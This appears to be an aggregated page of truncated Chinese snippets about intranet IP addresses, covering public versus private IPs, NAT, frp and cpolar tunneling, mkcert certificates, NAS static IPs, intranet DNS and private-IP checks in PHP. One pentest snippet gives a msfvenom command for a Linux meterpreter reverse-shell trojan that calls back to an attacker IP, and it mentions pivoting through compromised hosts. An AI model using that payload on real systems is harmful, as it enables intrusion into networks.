内网IP:局域网内部通信(如家庭设备、公司内部服务器)。4. 访问权限公网IP:可从互联网直接访问,需防火墙保护。内网IP:无法从外网直接访问,需通过NAT(网络地址转换)或端口映射实现外网通信。...内网IP:无额外成本,可无限复用。7. 安全性公网IP:暴露于互联网,易受攻击,需严格安全措施。内网IP:受局域网保护,外部无法直接访问,相对安全。8....典型应用公网IP:网站(如百度服务器)、远程访问公司系统。内网IP:家庭NAS、打印机共享、内部文件传输。...技术原理补充NAT(网络地址转换):内网设备通过路由器公网IP访问外网,实现“多设备共享一个公网IP”。...示例场景访问网站:你的手机(内网IP:192.168.1.5)通过路由器(公网IP:120.230.150.10)访问百度(公网IP:39.156.66.10)。
0x01 漏洞描述 - 内网IP地址泄露 - 内网 IP 通常显现在 Web 应用程序/服务器所生成的错误消息中,或显现在 HTML/JavaScript 注释和部分页面跳转链接中。...通过网站信息收集,发现其内网使用的 IP 地址(例如:内网 IP 地址段、IP 路由等等),可以帮助攻击者进行旨在渗透组织内部基础设施的网络层攻击。...测试发现网站的 JS 资源文件内容泄露了内网 IP 地址。 测试发现网站的页面跳转 URL 地址泄露了内网 IP 地址。...0x04 漏洞修复 建议开发人员不要在源代码中注释中包含有内网 IP 地址。 合理配置 WEB 服务器,禁止在数据交互中传输内网 IP 地址。...删除携带内网 IP 地址的页面,并制定完善的安全编码策略,并且及时检查存在的页面代码是否包含内部 IP 地址问题。
随着https的普及,如何給内网IP添加Https呢?让我们一起来看看吧!...#添加权限 chmod +x mkcert-v1.4.4-linux-amd64 #帮助 ..../mkcert-v1.4.4-linux-amd64 接下来,我们安装证书。执行下面命令 ./mkcert-v1.4.4-linux-amd64 -install 生成证书 执行命令 ..../mkcert-v1.4.4-linux-amd64 127.0.0.1 ::1 192.168.123.173 注意,这里的IP地址根据你内网的IP自行修改。尽量在路由器中设置绑定IP。...openssl x509 -outform der -in rootCA.pem -out your-cert2.crt 这样,我们便可以给我们内网的IP配置了https。当然,如果你有公网IP。
点赞 + 关注 + 收藏 = 学会了 整理了一个NAS小专栏,有兴趣的工友可以关注一下 《NAS邪修》 给 NAS 设置静态 IP,核心是解决默认 DHCP 自动分配导致 IP “乱跑” 的问题,相当于给...尤其是用 Docker 部署了一堆应用,要是 NAS 的 IP 一变,在 Docker 部署的应用也要跟着变了。...我手上有群晖、绿联、飞牛这3品牌的 NAS,我分别说说这几个品牌的 NAS 在哪可以设置静态 IP。 群晖 打开「控制面板」,选择「网络」。...点击「编辑」按钮,将“IPv4”这项改为“手动设置网络配置”,输入一个 IP 即可。 保存好之后,回到「网络界面」面板就能看到当前已经将「局域网 1」设置为静态 IP。...回到「网络设置」面板就能看到“IP 获取方式”这项从原本的“DHCP”变成“手动”了。
内网IP与公网IP:划分、区别与应用在计算机网络的世界里,IP地址作为设备的唯一标识符,扮演着至关重要的角色。IP地址主要分为两大类:内网IP(也称为私有IP)和公网IP(也称为公共IP)。...这两类IP地址在划分、功能及应用上存在着显著的差异。一、内网IP与公网IP的划分内网IP(私有IP) 内网IP是在局域网(LAN)或私有网络中使用的IP地址。...NAT技术可以将内网IP地址映射为公网IP地址,以实现内部设备与外部网络的连接。这种机制不仅节省了公网IP资源,还提高了网络的安全性。...二、内网IP与公网IP的区别唯一性与访问性公网IP:全球唯一,可以直接从互联网访问,具有全球可访问性。内网IP:在私有地址范围内,不可直接从外部访问,仅在局域网内有效。...三、内网IP与公网IP的应用内网IP的应用局域网内部通信:内网IP用于局域网内的设备之间的通信和连接。NAT技术:通过NAT技术,内网设备可以访问互联网,同时节省公网IP资源。
eureka等,都在本地起了起来,然后发现没有问题 (3)然后重新在服务器集群上重新部署了一套,发现还是超时connect timed out (4)最后发现下图中的箭头处地址为192.啥啥啥,反正就是内网地址...,别的服务器访问内网IP地址肯定访问不到啊 解决办法 此方法为最差的方法,因为需要手动指定,但是也能初步解决 spring: cloud: inetutils: preferred-networks
利用处于内网或防火墙后的机器,对外网环境提供 tcp 和 udp 服务,例如在家里通过 ssh 访问处于公司内网环境内的主机。...将 frps 及 frps.ini 放到具有公网 IP 的机器上。 将 frpc 及 frpc.ini 放到处于内网环境的机器上。.../frpc.ini 通过 ssh 访问内网机器,假设用户名为 test: ssh -oPort=6000 test@x.x.x.x 通过自定义域名访问部署于内网的 web 服务 有时想要让其他人通过域名访问或者测试我们在本地搭建的....tar.gz -O frp_linux_amd64.tar.gz tar zxf frp_linux_amd64.tar.gz cd frp_${version}_linux_amd64 mv frps....tar.gz -O frp_linux_amd64.tar.gz tar zxf frp_linux_amd64.tar.gz cd frp_${version}_linux_amd64 mv frpc
运维人员会为每套环境的相关项目配置单独的Tomcat,然后开放一个端口,以 IP+Port 的形式访问。...然而随着项目的增多,对于开发和测试人员记住如此多的内网地址,无疑是一件头疼的事情(当然你也可以使用浏览器书签管理器或者记录在某个地方)。...但是你不永远不会确定,那天由于升级突然改了IP,我们可能又要重新撸一遍配置,所以内网域名还是非常有必要的。...内网域名具体有哪些优点: 方便记忆 变更IP,只需要修改DNS即可 服务器环境 192.168.1.170(开发) 192.168.1.180(测试) 192.168.1.190(预生产) 192.168.1.125...本机验证 那么如何验证这些域名可以解析到我们的内网项目,只需要修改本机dns服务器地址即可: 配置完成后,我们就可以通过dev.52itstyle.com等相关域名访问我们的内网项目了。
,是目标边界网络设备的ip,原理是通过端口映射将网络设备(外网ip)上的web端口映射到了肉鸡(内网ip)的web端口上),我称之为正向连接测试。...生成msf木马 生成木马: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机ip LPORT=8000 -f elf > shell_8000...,2222为转发端口,127.0.0.1为肉鸡内网ip,3389为远程终端端口 。...内网嗅探 windows下可以使用cain,linux下可以使用msf中的模块。当然一般情况下,最好不要用内网嗅探,因为动静太大,而且可能会影响内网网络。...linux内网安全建议 说了这么多内网渗透的套路,按惯例最后该给出内网安全建设的几点建议了,当然只是个人看法。
运维人员会为每套环境的相关项目配置单独的Tomcat,然后开放一个端口,以 IP+Port 的形式访问。...然而随着项目的增多,对于开发和测试人员记住如此多的内网地址,无疑是一件头疼的事情(当然你也可以使用浏览器书签管理器或者记录在某个地方)。...但是你不永远不会确定,那天由于升级突然改了IP,我们可能又要重新撸一遍配置,所以内网域名还是非常有必要的。...内网域名具体有哪些优点: 方便记忆 变更IP,只需要修改DNS即可 服务器环境 192.168.1.170(开发) 192.168.1.180(测试) 192.168.1.190(预生产) 192.168.1.125...本机验证 那么如何验证这些域名可以解析到我们的内网项目,只需要修改本机dns服务器地址即可: ? 配置完成后,我们就可以通过dev.52itstyle.com等相关域名访问我们的内网项目了。
运维人员会为每套环境的相关项目配置单独的Tomcat,然后开放一个端口,以 IP+Port 的形式访问。...然而随着项目的增多,对于开发和测试人员记住如此多的内网地址,无疑是一件头疼的事情(当然你也可以使用浏览器书签管理器或者记录在某个地方)。...但是你不永远不会确定,那天由于升级突然改了IP,我们可能又要重新撸一遍配置,所以内网域名还是非常有必要的。...内网域名具体有哪些优点: 方便记忆 变更IP,只需要修改DNS即可 服务器环境 192.168.1.170(开发) 192.168.1.180(测试) 192.168.1.190(预生产) 192.168.1.125...本机验证 那么如何验证这些域名可以解析到我们的内网项目,只需要修改本机dns服务器地址即可: [dns.png] 配置完成后,我们就可以通过dev.52itstyle.com等相关域名访问我们的内网项目了
前言:IPIP隧道是一种三层隧道,通过把原来的IP包封装在新的IP包里面,来创建隧道传输。...本篇简单分析Linux(2.6.32版本)中的IPIP隧道的实现过程,期望有所借鉴,造出轮子:-) 一....IPIP的初始化 Linux中的IPIP隧道文件主要分布在tunnel4.c和ipip.c文件中。...因为是三层隧道,在IP报文中填充的三层协议自然就不能是常见的TCP和UDP,所以,Linux抽象了一个隧道层,位置就相当于传输层,主要的实现就是在tunnel4.c中。...IPIP的接收 我们之前说到过,对应从网卡收上来的报文,过完链路层后就会到ip_rcv()中,大概是这样的路线: ip_rcv()->ip_rcv_finish()->ip_local_deliver
接着补充几个点,比如内网穿透和内网打洞的概念,其实NAT也是内网穿透和内网打洞的基础,所以介绍了NAT之后理解内网穿透和内网打洞会容易很多。 最后补充一个代理的内容,我们的网络原理部分就算是结束了。...那么上述的过程,就成功的将公网IP作为一个中间站,通过请求的转发,让双方主机获取到了对方的IP和端口,从而可以直接进行通信。上述过程可以使用frp实现,我们后面可以详细测试一下内网穿透。...那么问题来了,我们平常的报文转发,好像就是这样的,通过NAT转发,找到对方的主机IP和端口,但是实际上,内网穿透解决的问题是:两台主机没有办法通信,所以我们需要一个IP进行中转 内网穿透也是非常常见的,...如下表: 项目 报文转发 内网穿透 适用前提 网络设备可控,有公网 IP,能设置端口映射 没有公网 IP、不能设置路由器 连接方向 被动接受请求 主动发起连接(绕过 NAT) 是否常见 企业级或服务器环境常用...:减少重复请求,提升加载速度(正向) 审计与过滤:企业中可用于记录和控制网络行为(正向) 实现内网穿透:通过公网代理访问内网服务(反向) 因为对方收到的都是代理服务器的IP+port,是不知道真实的
前天我们说了Windows下的内网传输技术: 【内网渗透】Windows下的内网传输技术 今天再来看看Linux下的内网传输吧~ Part.1 Wput/Wget Wput Wput是一款linux...Part.2 Curl Curl 我们之前还讲过一期curl工具: 【Linux】关于Curl工具与HTTP的二三事 也可以利用该工具进行http下载: curl –O http://192.168.3.1
而ip也分为公网ip和内网ip,二者之间虽然名字相似,但是区别是非常大的。公网ip也被称作为公共网络地址,部分人平时可能不太能够接触到公网ip,所以对于公网ip的了解不够深入。...不同的公网ip的类别的网段是不同的,而通过分类,也能够对ip地址更好地进行划分。 image.png 二、公网ip和内网ip的区别 1、公网ip和内网ip的ip地址的网段不同。...观察公网ip的ip地址和内网ip的ip地址就能够发现,二者之间的网段是有一定的区别的,这也是用来区分二者的主要特征。且公网ip的网段相较于内网ip网段,会更加广泛。 2、公网ip可直接连接。...公网ip不需要连接路由器或者宽带,服务器会为大家直接分配ip地址,所以在信号分布的地方可以直接使用。而内网ip需要通过路由器等等分配ip地址,否则是无法使用的。...以上就是对于公网ip的具体介绍以及公网ip和内网ip的区别。了解公网ip和内网ip,大家在平时使用网络的时候也就能够更加注意到一些细节,从而让上网变得更加快捷。
所以这篇文章教程,我们将通过vscode实现远程开发,并通过cpolar内网穿透实现在公网环境下的远程连接,让你在出门在外任意地方也可以远程连接服务器进行开发写代码。...局域网测试连接远程服务器 以ssh连接ubuntu为例,打开vscode后,先尝试使用局域网地址ssh远程ubuntu 输入命令到对话框中,并回车 ssh username@ip 选择一个配置文件 输入完成在右侧会显示出来刚刚添加的...不过我们通过内网穿透来实现在公网环境下的远程连接。这里我们借助工具cpolar内网穿透来实现,无需公网IP,也不用设置路由器,操作简单。...内网穿透,支持一键自动安装脚本。...点击SSH TARGETS下面显示的服务器旁边的按钮进行连接操作 如左侧没有出现添加的连接,点如下按钮刷新 接着点击小箭头 --> 连接,出现选择ssh 类型,选择linux 输入参数,和密码即可远程成功
在远程访问、企业组网等场景中,内网穿透和公网IP是两种常见的解决方案,但它们的原理、成本和使用方式截然不同。以下图片是两者的关键对比:1. 本质区别2....典型配置:向运营商申请固定公网IP(或动态公网IP+DDNS)在路由器设置端口转发(如将公网IP的80端口映射到内网服务器)优缺点:✅ 使用动态IP成本低,另可直接访问❌ 申请较难且需准备域名及进行域名备案...典型流程(以ZeroNews为例):内网设备安装代理程序,与穿透服务器建立加密连接外网用户通过分配的唯一域名访问内网服务优缺点:✅ 无需公网IP(解决NAT限制)✅ 开箱即用(无需路由器配置)✅ 默认安全...选择公网IP的场景需要7×24小时稳定服务(如企业官网、游戏服务器)对延迟极度敏感(如高频交易系统)已拥有固定公网IP且具备安全运维能力选择内网穿透的场景无公网IP(家庭宽带、企业内网受限)临时访问需求...总结公网IP是“直接开门”,适合长期稳定服务,但成本高、风险大。内网穿透是“安全通道”,适合快速、灵活、无公网IP的场景。
本文我们来学习在没有公网IP的情况下如何将本地的设备通过ipv6地址暴露在公网。当然将本地设备暴露在公网是有一定的风险的。如没有一定的业务要求,尽量不要暴露设备。...在之前,我家庭的内网设备都是通过frp进行端口映射,从而实现访问内网设备的。但是由于公网服务器的IP带宽的限制,导致访问性和稳定性较差。因此我们可以利用IPv6来彻底解决该问题。...实验环境 家庭网络支持IPV6(*) Centos7 (内网设备) PC 域名(可选) 验证ipv6网络 我们访问https://www.test-ipv6.com/来验证当前网络是否支持IPv6。...效果如下: 动态解析 因为获取到的IP地址是动态的,在光猫重启或者过段时间,IP地址会发生变化。因此我们需要对其进行动态解析,当IP地址发生变化时,自动解析到域名。...Linux服务器首先我们需要在阿里云控制台申请AccessKeyId、Access Key Secret 这里,我用了开源项目https://github.com/jeessy2/ddns-go 根据系统类型下载并启动
在公司内部网络研发过程中,是使用的内部服务器进行发布,因此访问的ip也是内部的ip。...这时候如果想对应用采用https访问的话,就需要配置对应的证书,但是市面上的证书需要使用到域名,并且基本都是基于互联网进行的认证,这种场景,在实际内网环境下,就变得难受,既不方便切换https后的调试,...下载 其最新版本地址如下:https://github.com/FiloSottile/mkcert/releases/latest 根据内部服务器的操作系统类型下载对应的windows/Linux/arm...wget https://github.com/FiloSottile/mkcert/releases/download/v1.4.4/mkcert-v1.4.4-linux-amd64 安装 # 赋予权限... chmod +x mkcert-v1.4.4-linux-amd64 # 将mkcert文件移动到bin目录下 sudo cp mkcert-v1.4.4-linux-amd64 /usr/local
FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE )) { header('HTTP/1.0 403 Forbidden'); die('禁止外网访问'); } 根据内网...ip段的范围检测ip2long的值 function ip_is_private($ip){ $pri_addrs = array( '10.0.0.0|10.255.255.255...= ip2long($ip); if($long_ip !...>= ip2long($start) && $long_ip ip2long($end)) return (TRUE); } } return...(FALSE); } 使用位操作符>>进行判断 function ip_is_internal($ip) { $ip = ip2long($ip); if (!